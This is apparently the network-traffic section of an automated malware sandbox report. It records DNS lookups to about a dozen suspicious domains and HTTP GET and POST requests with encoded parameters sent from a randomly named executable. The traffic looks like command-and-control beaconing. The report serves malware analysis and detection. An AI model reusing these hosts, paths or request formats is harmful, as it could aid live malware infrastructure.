                                                              Sep 12, 2024 15:08:03.161917925 CEST804978076.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:03.599111080 CEST804978076.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:03.599226952 CEST804978076.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:03.599426031 CEST4978080192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:04.663259983 CEST4978080192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:05.684871912 CEST4978180192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:05.729769945 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.732983112 CEST4978180192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:05.744869947 CEST4978180192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:05.750216007 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750286102 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750416040 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750430107 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750634909 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750648975 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750660896 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750673056 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:05.750684977 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:06.206929922 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:06.213434935 CEST804978176.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:06.213488102 CEST4978180192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:07.256952047 CEST4978180192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:08.287918091 CEST4978280192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:08.293104887 CEST804978276.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:08.293184996 CEST4978280192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:08.300906897 CEST4978280192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:08.306516886 CEST804978276.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:08.786214113 CEST804978276.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:08.786737919 CEST804978276.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:08.786855936 CEST4978280192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:08.789294004 CEST4978280192.168.2.476.223.113.161
                                                              Sep 12, 2024 15:08:08.794172049 CEST804978276.223.113.161192.168.2.4
                                                              Sep 12, 2024 15:08:22.176883936 CEST4978380192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:22.181751966 CEST804978384.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:22.181803942 CEST4978380192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:22.194998980 CEST4978380192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:22.199852943 CEST804978384.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:22.878165960 CEST804978384.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:22.878238916 CEST804978384.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:22.883445978 CEST4978380192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:23.710933924 CEST4978380192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:24.730818987 CEST4978480192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:24.735764027 CEST804978484.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:24.735995054 CEST4978480192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:24.750397921 CEST4978480192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:24.755289078 CEST804978484.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:25.443216085 CEST804978484.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:25.443507910 CEST804978484.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:25.443625927 CEST4978480192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:26.257071972 CEST4978480192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:27.276916981 CEST4978580192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:27.281836987 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.281961918 CEST4978580192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:27.299057961 CEST4978580192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:27.303975105 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.303986073 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304042101 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304050922 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304059029 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304102898 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304111958 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304120064 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.304150105 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.981729031 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.981828928 CEST804978584.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:27.981899023 CEST4978580192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:28.803855896 CEST4978580192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:29.843622923 CEST4978680192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:29.848747969 CEST804978684.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:29.848939896 CEST4978680192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:29.899676085 CEST4978680192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:29.904550076 CEST804978684.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:30.548763037 CEST804978684.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:30.548953056 CEST804978684.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:30.548965931 CEST804978684.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:30.549061060 CEST4978680192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:30.549091101 CEST4978680192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:30.552908897 CEST4978680192.168.2.484.32.84.37
                                                              Sep 12, 2024 15:08:30.557739973 CEST804978684.32.84.37192.168.2.4
                                                              Sep 12, 2024 15:08:35.708200932 CEST4978780192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:35.713325024 CEST80497873.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:35.713442087 CEST4978780192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:35.725043058 CEST4978780192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:35.730429888 CEST80497873.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:36.171818972 CEST80497873.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:36.171879053 CEST4978780192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:37.242955923 CEST4978780192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:37.247875929 CEST80497873.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.261574030 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:38.266628981 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.266705990 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:38.280320883 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:38.285274982 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.741099119 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:38.741158962 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:39.788501024 CEST4978880192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:39.793463945 CEST80497883.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.807609081 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:40.812591076 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.812690020 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:40.824382067 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:40.829307079 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829318047 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829327106 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829377890 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829394102 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829476118 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829484940 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829519033 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:40.829529047 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:42.214108944 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:42.214170933 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:42.335201025 CEST4978980192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:42.340548038 CEST80497893.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:43.356921911 CEST4979080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:43.361944914 CEST80497903.33.130.190192.168.2.4
                                                              Sep 12, 2024 15:08:43.362076044 CEST4979080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:43.369678020 CEST4979080192.168.2.43.33.130.190
                                                              Sep 12, 2024 15:08:43.374630928 CEST80497903.33.130.190192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 12, 2024 15:05:29.315604925 CEST6477253192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:05:30.319345951 CEST6477253192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:05:30.759830952 CEST53647721.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:05:30.759849072 CEST53647721.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:05:46.699390888 CEST5979853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:05:46.732034922 CEST53597981.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:00.230356932 CEST5956953192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:00.723598957 CEST53595691.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:14.197856903 CEST5505853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:14.212754965 CEST53550581.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:27.349145889 CEST5696053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:27.781498909 CEST53569601.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:41.224716902 CEST6138153192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:41.481323004 CEST53613811.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:06:54.604335070 CEST5657853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:06:54.636746883 CEST53565781.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:07.776221037 CEST6090053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:08.772476912 CEST6090053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:09.788156033 CEST6090053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:10.245091915 CEST53609001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:10.245115995 CEST53609001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:10.245125055 CEST53609001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:13.289899111 CEST5012053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:13.301229954 CEST53501201.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:18.307971001 CEST5731053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:18.325428009 CEST53573101.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:31.697649002 CEST5459253192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:31.880407095 CEST53545921.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:07:45.762868881 CEST5570953192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:07:46.241389990 CEST53557091.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:00.543067932 CEST5810053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:00.579713106 CEST53581001.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:13.808892965 CEST5489053192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:14.059242964 CEST53548901.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:22.123928070 CEST5610853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:22.174263954 CEST53561081.1.1.1192.168.2.4
                                                              Sep 12, 2024 15:08:35.685852051 CEST6285853192.168.2.41.1.1.1
                                                              Sep 12, 2024 15:08:35.705642939 CEST53628581.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Sep 12, 2024 15:05:29.315604925 CEST192.168.2.41.1.1.10x7da7Standard query (0)www.jz07259dkijw.cloudA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:05:30.319345951 CEST192.168.2.41.1.1.10x7da7Standard query (0)www.jz07259dkijw.cloudA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:05:46.699390888 CEST192.168.2.41.1.1.10xd5d0Standard query (0)www.academy-training.xyzA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:00.230356932 CEST192.168.2.41.1.1.10x5ffeStandard query (0)www.fslab.techA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:14.197856903 CEST192.168.2.41.1.1.10x3db2Standard query (0)www.vip66.zoneA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:27.349145889 CEST192.168.2.41.1.1.10x60c3Standard query (0)www.lyxor.topA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:41.224716902 CEST192.168.2.41.1.1.10xa457Standard query (0)www.unveiled.digitalA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:54.604335070 CEST192.168.2.41.1.1.10xbe75Standard query (0)www.cake11298.onlineA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:07.776221037 CEST192.168.2.41.1.1.10x87b6Standard query (0)www.xsg.icuA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:08.772476912 CEST192.168.2.41.1.1.10x87b6Standard query (0)www.xsg.icuA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:09.788156033 CEST192.168.2.41.1.1.10x87b6Standard query (0)www.xsg.icuA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:13.289899111 CEST192.168.2.41.1.1.10x4be2Standard query (0)www.xsg.icuA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:18.307971001 CEST192.168.2.41.1.1.10xd8dStandard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:31.697649002 CEST192.168.2.41.1.1.10x1237Standard query (0)www.shipincheshi.skinA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:45.762868881 CEST192.168.2.41.1.1.10x3533Standard query (0)www.sssqqq07-22.funA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:00.543067932 CEST192.168.2.41.1.1.10x49f8Standard query (0)www.justlivn.netA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:13.808892965 CEST192.168.2.41.1.1.10xc9dfStandard query (0)www.mypos.supportA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:22.123928070 CEST192.168.2.41.1.1.10x4724Standard query (0)www.healtheduction.siteA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:35.685852051 CEST192.168.2.41.1.1.10xf525Standard query (0)www.globyglen.infoA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Sep 12, 2024 15:05:30.759830952 CEST1.1.1.1192.168.2.40x7da7No error (0)www.jz07259dkijw.cloudlaohuang.zhongshengxinyun.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:05:30.759830952 CEST1.1.1.1192.168.2.40x7da7No error (0)laohuang.zhongshengxinyun.com43.135.99.21A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:05:30.759849072 CEST1.1.1.1192.168.2.40x7da7No error (0)www.jz07259dkijw.cloudlaohuang.zhongshengxinyun.comCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:05:30.759849072 CEST1.1.1.1192.168.2.40x7da7No error (0)laohuang.zhongshengxinyun.com43.135.99.21A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:05:46.732034922 CEST1.1.1.1192.168.2.40xd5d0No error (0)www.academy-training.xyz79.125.89.83A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:05:46.732034922 CEST1.1.1.1192.168.2.40xd5d0No error (0)www.academy-training.xyz54.171.44.82A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:00.723598957 CEST1.1.1.1192.168.2.40x5ffeNo error (0)www.fslab.tech160.251.148.115A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:14.212754965 CEST1.1.1.1192.168.2.40x3db2No error (0)www.vip66.zonevip66.zoneCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:06:14.212754965 CEST1.1.1.1192.168.2.40x3db2No error (0)vip66.zone3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:14.212754965 CEST1.1.1.1192.168.2.40x3db2No error (0)vip66.zone15.197.148.33A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:27.781498909 CEST1.1.1.1192.168.2.40x60c3No error (0)www.lyxor.top203.161.43.228A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:41.481323004 CEST1.1.1.1192.168.2.40xa457No error (0)www.unveiled.digitalunveiled.digitalCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:06:41.481323004 CEST1.1.1.1192.168.2.40xa457No error (0)unveiled.digital3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:41.481323004 CEST1.1.1.1192.168.2.40xa457No error (0)unveiled.digital15.197.148.33A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:54.636746883 CEST1.1.1.1192.168.2.40xbe75No error (0)www.cake11298.onlinencumibrs.github.ioCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:06:54.636746883 CEST1.1.1.1192.168.2.40xbe75No error (0)ncumibrs.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:54.636746883 CEST1.1.1.1192.168.2.40xbe75No error (0)ncumibrs.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:54.636746883 CEST1.1.1.1192.168.2.40xbe75No error (0)ncumibrs.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:06:54.636746883 CEST1.1.1.1192.168.2.40xbe75No error (0)ncumibrs.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:10.245091915 CEST1.1.1.1192.168.2.40x87b6Name error (3)www.xsg.icunonenoneA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:10.245115995 CEST1.1.1.1192.168.2.40x87b6Name error (3)www.xsg.icunonenoneA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:10.245125055 CEST1.1.1.1192.168.2.40x87b6Name error (3)www.xsg.icunonenoneA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:13.301229954 CEST1.1.1.1192.168.2.40x4be2Name error (3)www.xsg.icunonenoneA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:18.325428009 CEST1.1.1.1192.168.2.40xd8dNo error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:07:18.325428009 CEST1.1.1.1192.168.2.40xd8dNo error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:31.880407095 CEST1.1.1.1192.168.2.40x1237No error (0)www.shipincheshi.skin154.23.176.197A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:31.880407095 CEST1.1.1.1192.168.2.40x1237No error (0)www.shipincheshi.skin154.23.176.232A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:07:46.241389990 CEST1.1.1.1192.168.2.40x3533No error (0)www.sssqqq07-22.fun45.113.201.77A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:00.579713106 CEST1.1.1.1192.168.2.40x49f8No error (0)www.justlivn.netjustlivn.netCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:08:00.579713106 CEST1.1.1.1192.168.2.40x49f8No error (0)justlivn.net76.223.113.161A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:14.059242964 CEST1.1.1.1192.168.2.40xc9dfServer failure (2)www.mypos.supportnonenoneA (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:22.174263954 CEST1.1.1.1192.168.2.40x4724No error (0)www.healtheduction.sitewww.healtheduction.site.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:08:22.174263954 CEST1.1.1.1192.168.2.40x4724No error (0)www.healtheduction.site.cdn.hstgr.net84.32.84.37A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:35.705642939 CEST1.1.1.1192.168.2.40xf525No error (0)www.globyglen.infoglobyglen.infoCNAME (Canonical name)IN (0x0001)false
                                                              Sep 12, 2024 15:08:35.705642939 CEST1.1.1.1192.168.2.40xf525No error (0)globyglen.info3.33.130.190A (IP address)IN (0x0001)false
                                                              Sep 12, 2024 15:08:35.705642939 CEST1.1.1.1192.168.2.40xf525No error (0)globyglen.info15.197.148.33A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.jz07259dkijw.cloud
                                                              • www.academy-training.xyz
                                                              • www.fslab.tech
                                                              • www.vip66.zone
                                                              • www.lyxor.top
                                                              • www.unveiled.digital
                                                              • www.cake11298.online
                                                              • www.jobworklanka.online
                                                              • www.shipincheshi.skin
                                                              • www.sssqqq07-22.fun
                                                              • www.justlivn.net
                                                              • www.healtheduction.site
                                                              • www.globyglen.info

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.44974143.135.99.21805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:05:30.788381100 CEST437OUTGET /yubh/?3tV=MGGAmHlvP++E3KpIg/FvL8i1JT0OgWxwxFcygqL2UA5R59sdx989XYnZ+w7o4wVQKi3RHCwbh3FXDB4APLYG/bTnAIRthbjQ9IlTiulES96X0xboBN3l7cI=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.jz07259dkijw.cloud
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:05:31.654726028 CEST289INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:05:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.44974279.125.89.83805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:05:46.756665945 CEST716OUTPOST /1ki5/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              Origin: http://www.academy-training.xyz
                                                              Referer: http://www.academy-training.xyz/1ki5/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 74 75 71 4b 32 56 7a 6e 4c 78 51 54 4d 71 59 32 43 35 4a 6b 56 66 6c 68 54 4c 51 70 7a 48 46 46 4a 4d 30 73 63 41 73 77 38 67 56 6a 75 42 68 44 78 41 76 49 44 45 2b 37 52 51 36 67 66 4f 58 41 70 59 53 38 72 59 72 49 74 6c 6d 33 41 6e 38 62 77 71 42 46 4a 79 34 35 34 46 43 5a 58 41 4c 77 35 67 71 64 5a 46 55 79 54 77 70 2f 4e 73 35 32 61 45 75 44 41 6b 53 59 74 30 53 66 72 66 77 58 61 63 6b 56 52 58 71 41 48 71 69 79 76 54 6a 65 4e 39 67 37 31 2b 32 7a 50 33 4d 67 71 6a 4e 44 44 34 6b 51 68 69 66 38 56 4b 32 6d 32 5a 36 71 44 2f 4e 66 57 32 52 35 65 36 65 6d 79 30 79 65 34 67 3d 3d
                                                              Data Ascii: 3tV=tuqK2VznLxQTMqY2C5JkVflhTLQpzHFFJM0scAsw8gVjuBhDxAvIDE+7RQ6gfOXApYS8rYrItlm3An8bwqBFJy454FCZXALw5gqdZFUyTwp/Ns52aEuDAkSYt0SfrfwXackVRXqAHqiyvTjeN9g71+2zP3MgqjNDD4kQhif8VK2m2Z6qD/NfW2R5e6emy0ye4g==
                                                              Sep 12, 2024 15:05:47.701035023 CEST488INHTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip
                                                              Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0
                                                              Sep 12, 2024 15:05:47.701590061 CEST488INHTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip
